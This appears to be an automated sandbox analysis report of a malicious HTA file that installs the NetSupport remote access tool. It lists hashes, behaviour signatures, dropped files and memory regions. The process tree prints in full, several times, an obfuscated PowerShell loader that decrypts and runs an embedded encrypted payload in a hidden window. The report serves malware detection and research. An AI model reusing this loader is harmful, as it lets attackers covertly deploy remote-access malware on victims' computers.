Analysis

  • max time kernel
    142s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-08-2023 19:40

General

  • Target

    localer-en.hta

  • Size

    1.1MB

  • MD5

    674e3c0ae0f2627c10b58a717ee093bd

  • SHA1

    21f15d58046119712572a5114b781027c99f7bc4

  • SHA256

    b5f52078915dbe23dcb847e7badd546e1325403e56694ea624aac39c68d6f985

  • SHA512

    4d6444d49befa990756aa4e668ac6b664b4bdd1b19bf3914afe067ed0ed0d6ee6e34a114e0a47d1363bcf588b307f032b3c0638620385f02d12583f1706d37ef

  • SSDEEP

    1536:7pLwiizmnY5q7O2Db9L1/j/SFBOWrhRxPNahQo8y8Im+lIWFT5YhmFfON/H8P2c0:7ppizmnYs7Og9LNjaH1rhRxPNahYYPs

Score
10/10

Malware Config

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\localer-en.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3312
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $jvrvREYW = 'AAAAAAAAAAAAAAAAAAAAACgiT7Y6Z5d/gZwdUWnb/wGi4NctLSgkyccbly+bEqQsyRsSSqGsbJkH8xfddXt1oDHIKDlWlkPbqfbGz7Pqyi8DESzA5X9WncEpM+hQdLk6SnFNyN7Jv2VHG5Kfp/y4cw1AfxzLYmEGNCdUsR1JiqlFnCLj02Pq6PcZynb5Srpc8xDiyvtwMifuO7Na/a3hWjJ/MxJ0qCdBl/uag/A2lOte5S6dmgxB97AjvlQD6+XzkIpm+Cyd13C7wRAQ4ezINZzs9oMChO54QkRC7+AZhpVgw/vSUr2Mvo6rBLBD2SUx5mLjXOUlfO+qI8/RuDoqKji4hNYsRRDe5jcSwTHMTNf8Zea5zKrBV0yduMUBgDZRVfPAyLyF0IJeTgCsNNbtcNItTHW6NpzI3L7dyfL23vAMG0YpE2wIidNAvyYzYwKb5HUYHGRciHJCm2zyT0ohu27CR7v63ad1DRUiBdR8CHxLodUpDYz49YAwcpcNOKw+kAJ6C7662AFYdrwJFzRI4hpUd6smMl0xS25yr4eIxgEk5AZ02dptSG5SP5bsrq+N52rMlvKV2VlMTc9j61edotkWFoFj6H5rLeTWngfraYY1+qRFh4KQYqN48hPLqo2q+qbwsxRRVU9JHGRjARME4Gu1WOqX5dv/RhQH0w+67EGyyLZa8osvyqrrOqA5QhXMuZT1zB/XuQu9Xd2jPpYTcCxQ6uUH3snmxKT6yEZVA0S3SguKXBxUZ80uGEe2VuaUzDT+nFDoKUUuubIb4CU66ScnyzfXI5LeB+9/TtowRSaEpy1CVhMl6WZ/fYRXvk1lGnJPrhZfbPSYZZx/k7VyhKYHe2AY2YeMItx3v3PGULaX9ktSeiJ2T6N7ZE85xKZ+SD1xgIPv7grsnTBCKR9I8qjIcjVh3W//6FkCBv9WLc+jmfnvFATuBwxGAvSx5/IQKf0nG+wvVZVRl0Z6WuysQ8BMMd7HJ4PD4tPpM7etQiFPIMdiMXUgc5608zbHvqmuhn/03fZlHLqON4OhTX1a7Z+vVxp0gMIoox1wBxuCzws=';$buWIRXRM = 'Y3J5enZTRlFMY1lVZkFzdFdhUkFpZnpQTkhuRlF5UFE=';$WpUVMfnw = New-Object 'System.Security.Cryptography.AesManaged';$WpUVMfnw.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpUVMfnw.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpUVMfnw.BlockSize = 128;$WpUVMfnw.KeySize = 256;$WpUVMfnw.Key = [System.Convert]::FromBase64String($buWIRXRM);$wQRtj = [System.Convert]::FromBase64String($jvrvREYW);$DzLdUhRi = $wQRtj[0..15];$WpUVMfnw.IV = $DzLdUhRi;$jJnybVCSh = $WpUVMfnw.CreateDecryptor();$HDfASYyGf = $jJnybVCSh.TransformFinalBlock($wQRtj, 16, $wQRtj.Length - 16);$WpUVMfnw.Dispose();$RtuBu = New-Object System.IO.MemoryStream( , $HDfASYyGf );$coZHjS = New-Object System.IO.MemoryStream;$ZbwYXDHvr = New-Object System.IO.Compression.GzipStream $RtuBu, ([IO.Compression.CompressionMode]::Decompress);$ZbwYXDHvr.CopyTo( $coZHjS );$ZbwYXDHvr.Close();$RtuBu.Close();[byte[]] $lBmCn = $coZHjS.ToArray();$EcHwkbNX = [System.Text.Encoding]::UTF8.GetString($lBmCn);$EcHwkbNX | powershell - }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2384
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $jvrvREYW = 'AAAAAAAAAAAAAAAAAAAAACgiT7Y6Z5d/gZwdUWnb/wGi4NctLSgkyccbly+bEqQsyRsSSqGsbJkH8xfddXt1oDHIKDlWlkPbqfbGz7Pqyi8DESzA5X9WncEpM+hQdLk6SnFNyN7Jv2VHG5Kfp/y4cw1AfxzLYmEGNCdUsR1JiqlFnCLj02Pq6PcZynb5Srpc8xDiyvtwMifuO7Na/a3hWjJ/MxJ0qCdBl/uag/A2lOte5S6dmgxB97AjvlQD6+XzkIpm+Cyd13C7wRAQ4ezINZzs9oMChO54QkRC7+AZhpVgw/vSUr2Mvo6rBLBD2SUx5mLjXOUlfO+qI8/RuDoqKji4hNYsRRDe5jcSwTHMTNf8Zea5zKrBV0yduMUBgDZRVfPAyLyF0IJeTgCsNNbtcNItTHW6NpzI3L7dyfL23vAMG0YpE2wIidNAvyYzYwKb5HUYHGRciHJCm2zyT0ohu27CR7v63ad1DRUiBdR8CHxLodUpDYz49YAwcpcNOKw+kAJ6C7662AFYdrwJFzRI4hpUd6smMl0xS25yr4eIxgEk5AZ02dptSG5SP5bsrq+N52rMlvKV2VlMTc9j61edotkWFoFj6H5rLeTWngfraYY1+qRFh4KQYqN48hPLqo2q+qbwsxRRVU9JHGRjARME4Gu1WOqX5dv/RhQH0w+67EGyyLZa8osvyqrrOqA5QhXMuZT1zB/XuQu9Xd2jPpYTcCxQ6uUH3snmxKT6yEZVA0S3SguKXBxUZ80uGEe2VuaUzDT+nFDoKUUuubIb4CU66ScnyzfXI5LeB+9/TtowRSaEpy1CVhMl6WZ/fYRXvk1lGnJPrhZfbPSYZZx/k7VyhKYHe2AY2YeMItx3v3PGULaX9ktSeiJ2T6N7ZE85xKZ+SD1xgIPv7grsnTBCKR9I8qjIcjVh3W//6FkCBv9WLc+jmfnvFATuBwxGAvSx5/IQKf0nG+wvVZVRl0Z6WuysQ8BMMd7HJ4PD4tPpM7etQiFPIMdiMXUgc5608zbHvqmuhn/03fZlHLqON4OhTX1a7Z+vVxp0gMIoox1wBxuCzws=';$buWIRXRM = 'Y3J5enZTRlFMY1lVZkFzdFdhUkFpZnpQTkhuRlF5UFE=';$WpUVMfnw = New-Object 'System.Security.Cryptography.AesManaged';$WpUVMfnw.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpUVMfnw.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpUVMfnw.BlockSize = 128;$WpUVMfnw.KeySize = 256;$WpUVMfnw.Key = [System.Convert]::FromBase64String($buWIRXRM);$wQRtj = [System.Convert]::FromBase64String($jvrvREYW);$DzLdUhRi = $wQRtj[0..15];$WpUVMfnw.IV = $DzLdUhRi;$jJnybVCSh = $WpUVMfnw.CreateDecryptor();$HDfASYyGf = $jJnybVCSh.TransformFinalBlock($wQRtj, 16, $wQRtj.Length - 16);$WpUVMfnw.Dispose();$RtuBu = New-Object System.IO.MemoryStream( , $HDfASYyGf );$coZHjS = New-Object System.IO.MemoryStream;$ZbwYXDHvr = New-Object System.IO.Compression.GzipStream $RtuBu, ([IO.Compression.CompressionMode]::Decompress);$ZbwYXDHvr.CopyTo( $coZHjS );$ZbwYXDHvr.Close();$RtuBu.Close();[byte[]] $lBmCn = $coZHjS.ToArray();$EcHwkbNX = [System.Text.Encoding]::UTF8.GetString($lBmCn);$EcHwkbNX | powershell -
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3860
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $jvrvREYW = 'AAAAAAAAAAAAAAAAAAAAACgiT7Y6Z5d/gZwdUWnb/wGi4NctLSgkyccbly+bEqQsyRsSSqGsbJkH8xfddXt1oDHIKDlWlkPbqfbGz7Pqyi8DESzA5X9WncEpM+hQdLk6SnFNyN7Jv2VHG5Kfp/y4cw1AfxzLYmEGNCdUsR1JiqlFnCLj02Pq6PcZynb5Srpc8xDiyvtwMifuO7Na/a3hWjJ/MxJ0qCdBl/uag/A2lOte5S6dmgxB97AjvlQD6+XzkIpm+Cyd13C7wRAQ4ezINZzs9oMChO54QkRC7+AZhpVgw/vSUr2Mvo6rBLBD2SUx5mLjXOUlfO+qI8/RuDoqKji4hNYsRRDe5jcSwTHMTNf8Zea5zKrBV0yduMUBgDZRVfPAyLyF0IJeTgCsNNbtcNItTHW6NpzI3L7dyfL23vAMG0YpE2wIidNAvyYzYwKb5HUYHGRciHJCm2zyT0ohu27CR7v63ad1DRUiBdR8CHxLodUpDYz49YAwcpcNOKw+kAJ6C7662AFYdrwJFzRI4hpUd6smMl0xS25yr4eIxgEk5AZ02dptSG5SP5bsrq+N52rMlvKV2VlMTc9j61edotkWFoFj6H5rLeTWngfraYY1+qRFh4KQYqN48hPLqo2q+qbwsxRRVU9JHGRjARME4Gu1WOqX5dv/RhQH0w+67EGyyLZa8osvyqrrOqA5QhXMuZT1zB/XuQu9Xd2jPpYTcCxQ6uUH3snmxKT6yEZVA0S3SguKXBxUZ80uGEe2VuaUzDT+nFDoKUUuubIb4CU66ScnyzfXI5LeB+9/TtowRSaEpy1CVhMl6WZ/fYRXvk1lGnJPrhZfbPSYZZx/k7VyhKYHe2AY2YeMItx3v3PGULaX9ktSeiJ2T6N7ZE85xKZ+SD1xgIPv7grsnTBCKR9I8qjIcjVh3W//6FkCBv9WLc+jmfnvFATuBwxGAvSx5/IQKf0nG+wvVZVRl0Z6WuysQ8BMMd7HJ4PD4tPpM7etQiFPIMdiMXUgc5608zbHvqmuhn/03fZlHLqON4OhTX1a7Z+vVxp0gMIoox1wBxuCzws=';$buWIRXRM = 'Y3J5enZTRlFMY1lVZkFzdFdhUkFpZnpQTkhuRlF5UFE=';$WpUVMfnw = New-Object 'System.Security.Cryptography.AesManaged';$WpUVMfnw.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpUVMfnw.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpUVMfnw.BlockSize = 128;$WpUVMfnw.KeySize = 256;$WpUVMfnw.Key = [System.Convert]::FromBase64String($buWIRXRM);$wQRtj = [System.Convert]::FromBase64String($jvrvREYW);$DzLdUhRi = $wQRtj[0..15];$WpUVMfnw.IV = $DzLdUhRi;$jJnybVCSh = $WpUVMfnw.CreateDecryptor();$HDfASYyGf = $jJnybVCSh.TransformFinalBlock($wQRtj, 16, $wQRtj.Length - 16);$WpUVMfnw.Dispose();$RtuBu = New-Object System.IO.MemoryStream( , $HDfASYyGf );$coZHjS = New-Object System.IO.MemoryStream;$ZbwYXDHvr = New-Object System.IO.Compression.GzipStream $RtuBu, ([IO.Compression.CompressionMode]::Decompress);$ZbwYXDHvr.CopyTo( $coZHjS );$ZbwYXDHvr.Close();$RtuBu.Close();[byte[]] $lBmCn = $coZHjS.ToArray();$EcHwkbNX = [System.Text.Encoding]::UTF8.GetString($lBmCn);$EcHwkbNX
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4812
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • Blocklisted process makes network request
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1776
          • C:\Users\Admin\AppData\Local\Temp\SunnyFa\client32.exe
            "C:\Users\Admin\AppData\Local\Temp\SunnyFa\client32.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:4772
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:752

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      1KB

      MD5

      def65711d78669d7f8e69313be4acf2e

      SHA1

      6522ebf1de09eeb981e270bd95114bc69a49cda6

      SHA256

      aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

      SHA512

      05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      15KB

      MD5

      655e1f8219c2c66cca5cb26b598cf76a

      SHA1

      aae7bbcd908a5b0c7167ed98d55e42fba3ab1722

      SHA256

      40f450b40866d7ce80c123f13e981e34aa7a02d20b4ea61c4c4fc64e6c6c0539

      SHA512

      60f8cde5b724b39ab1acd8ad878f0bc1da3e3b7a25b3b5262935f4c27b99e29c3d0b109b715afb3f45074e6e7212ff2c6810ea6c9d7f8b94c02706bc48d4bb47

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\HTCTL32.DLL

      Filesize

      320KB

      MD5

      2d3b207c8a48148296156e5725426c7f

      SHA1

      ad464eb7cf5c19c8a443ab5b590440b32dbc618f

      SHA256

      edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

      SHA512

      55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\HTCTL32.DLL

      Filesize

      320KB

      MD5

      2d3b207c8a48148296156e5725426c7f

      SHA1

      ad464eb7cf5c19c8a443ab5b590440b32dbc618f

      SHA256

      edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

      SHA512

      55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\MSVCR100.dll

      Filesize

      755KB

      MD5

      0e37fbfa79d349d672456923ec5fbbe3

      SHA1

      4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

      SHA256

      8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

      SHA512

      2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\NSM.LIC

      Filesize

      257B

      MD5

      7067af414215ee4c50bfcd3ea43c84f0

      SHA1

      c331d410672477844a4ca87f43a14e643c863af9

      SHA256

      2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12

      SHA512

      17b888087192bcea9f56128d0950423b1807e294d1c4f953d1bf0f5bd08e5f8e35afeee584ebf9233bfc44e0723db3661911415798159ac118c8a42aaf0b902f

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\PCICHEK.DLL

      Filesize

      18KB

      MD5

      a0b9388c5f18e27266a31f8c5765b263

      SHA1

      906f7e94f841d464d4da144f7c858fa2160e36db

      SHA256

      313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

      SHA512

      6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\PCICL32.DLL

      Filesize

      3.6MB

      MD5

      00587238d16012152c2e951a087f2cc9

      SHA1

      c4e27a43075ce993ff6bb033360af386b2fc58ff

      SHA256

      63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

      SHA512

      637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\PCICL32.dll

      Filesize

      3.6MB

      MD5

      00587238d16012152c2e951a087f2cc9

      SHA1

      c4e27a43075ce993ff6bb033360af386b2fc58ff

      SHA256

      63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8

      SHA512

      637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\client32.exe

      Filesize

      103KB

      MD5

      8d9709ff7d9c83bd376e01912c734f0a

      SHA1

      e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294

      SHA256

      49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3

      SHA512

      042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\client32.exe

      Filesize

      103KB

      MD5

      8d9709ff7d9c83bd376e01912c734f0a

      SHA1

      e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294

      SHA256

      49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3

      SHA512

      042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\client32.exe

      Filesize

      103KB

      MD5

      8d9709ff7d9c83bd376e01912c734f0a

      SHA1

      e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294

      SHA256

      49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3

      SHA512

      042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\client32.ini

      Filesize

      665B

      MD5

      48a672ef1eb0e86ab3b250678288531a

      SHA1

      73edc9ab3aaea605cd47b6525b5f1072b9d2a37c

      SHA256

      4dbf69b99981bc92ae560ff79ab814be8f7a9ab13df2c4eee893b15f55077062

      SHA512

      4095d0359202dfadb0afa22cdfcbf62012466373a357da0033267494fc14167000afaa67fbc26b239e8b2722265fc1c873cb37a0fc941213e6185f9ca1c9e107

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\msvcr100.dll

      Filesize

      755KB

      MD5

      0e37fbfa79d349d672456923ec5fbbe3

      SHA1

      4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

      SHA256

      8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

      SHA512

      2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\pcicapi.dll

      Filesize

      32KB

      MD5

      dcde2248d19c778a41aa165866dd52d0

      SHA1

      7ec84be84fe23f0b0093b647538737e1f19ebb03

      SHA256

      9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

      SHA512

      c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\pcicapi.dll

      Filesize

      32KB

      MD5

      dcde2248d19c778a41aa165866dd52d0

      SHA1

      7ec84be84fe23f0b0093b647538737e1f19ebb03

      SHA256

      9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

      SHA512

      c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

    • C:\Users\Admin\AppData\Local\Temp\SunnyFa\pcichek.dll

      Filesize

      18KB

      MD5

      a0b9388c5f18e27266a31f8c5765b263

      SHA1

      906f7e94f841d464d4da144f7c858fa2160e36db

      SHA256

      313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

      SHA512

      6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xwcuykdk.dmp.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1776-57-0x0000000002250000-0x0000000002260000-memory.dmp

      Filesize

      64KB

    • memory/1776-76-0x0000000007C30000-0x0000000007C4E000-memory.dmp

      Filesize

      120KB

    • memory/1776-125-0x0000000070E90000-0x0000000071640000-memory.dmp

      Filesize

      7.7MB

    • memory/1776-26-0x0000000070E90000-0x0000000071640000-memory.dmp

      Filesize

      7.7MB

    • memory/1776-28-0x0000000002250000-0x0000000002260000-memory.dmp

      Filesize

      64KB

    • memory/1776-79-0x0000000007D70000-0x0000000007D7A000-memory.dmp

      Filesize

      40KB

    • memory/1776-52-0x0000000005FE0000-0x0000000006024000-memory.dmp

      Filesize

      272KB

    • memory/1776-78-0x0000000007E00000-0x0000000007E12000-memory.dmp

      Filesize

      72KB

    • memory/1776-77-0x0000000007D70000-0x0000000007D7A000-memory.dmp

      Filesize

      40KB

    • memory/1776-56-0x0000000006E30000-0x0000000006EA6000-memory.dmp

      Filesize

      472KB

    • memory/1776-30-0x0000000002250000-0x0000000002260000-memory.dmp

      Filesize

      64KB

    • memory/1776-58-0x0000000070E90000-0x0000000071640000-memory.dmp

      Filesize

      7.7MB

    • memory/1776-59-0x0000000002250000-0x0000000002260000-memory.dmp

      Filesize

      64KB

    • memory/1776-60-0x0000000002250000-0x0000000002260000-memory.dmp

      Filesize

      64KB

    • memory/1776-61-0x0000000002250000-0x0000000002260000-memory.dmp

      Filesize

      64KB

    • memory/1776-63-0x000000007F000000-0x000000007F010000-memory.dmp

      Filesize

      64KB

    • memory/1776-65-0x000000006D750000-0x000000006D79C000-memory.dmp

      Filesize

      304KB

    • memory/1776-64-0x0000000007C70000-0x0000000007CA2000-memory.dmp

      Filesize

      200KB

    • memory/1776-66-0x000000006D8B0000-0x000000006DC04000-memory.dmp

      Filesize

      3.3MB

    • memory/2384-0-0x0000000070E90000-0x0000000071640000-memory.dmp

      Filesize

      7.7MB

    • memory/2384-6-0x0000000006040000-0x00000000060A6000-memory.dmp

      Filesize

      408KB

    • memory/2384-2-0x0000000002D70000-0x0000000002D80000-memory.dmp

      Filesize

      64KB

    • memory/2384-1-0x0000000002D80000-0x0000000002DB6000-memory.dmp

      Filesize

      216KB

    • memory/2384-3-0x00000000057B0000-0x0000000005DD8000-memory.dmp

      Filesize

      6.2MB

    • memory/2384-4-0x00000000056D0000-0x00000000056F2000-memory.dmp

      Filesize

      136KB

    • memory/2384-24-0x0000000070E90000-0x0000000071640000-memory.dmp

      Filesize

      7.7MB

    • memory/2384-21-0x0000000007C90000-0x0000000008234000-memory.dmp

      Filesize

      5.6MB

    • memory/2384-20-0x0000000006C00000-0x0000000006C22000-memory.dmp

      Filesize

      136KB

    • memory/2384-19-0x0000000006BB0000-0x0000000006BCA000-memory.dmp

      Filesize

      104KB

    • memory/2384-18-0x0000000007640000-0x00000000076D6000-memory.dmp

      Filesize

      600KB

    • memory/2384-17-0x0000000002D70000-0x0000000002D80000-memory.dmp

      Filesize

      64KB

    • memory/2384-16-0x0000000006680000-0x000000000669E000-memory.dmp

      Filesize

      120KB

    • memory/2384-5-0x0000000005FD0000-0x0000000006036000-memory.dmp

      Filesize

      408KB

    • memory/4812-55-0x0000000070E90000-0x0000000071640000-memory.dmp

      Filesize

      7.7MB

    • memory/4812-31-0x0000000005010000-0x0000000005020000-memory.dmp

      Filesize

      64KB

    • memory/4812-29-0x0000000005010000-0x0000000005020000-memory.dmp

      Filesize

      64KB

    • memory/4812-27-0x0000000070E90000-0x0000000071640000-memory.dmp

      Filesize

      7.7MB

    • memory/4812-51-0x0000000005010000-0x0000000005020000-memory.dmp

      Filesize

      64KB

    • memory/4812-53-0x0000000007CF0000-0x000000000836A000-memory.dmp

      Filesize

      6.5MB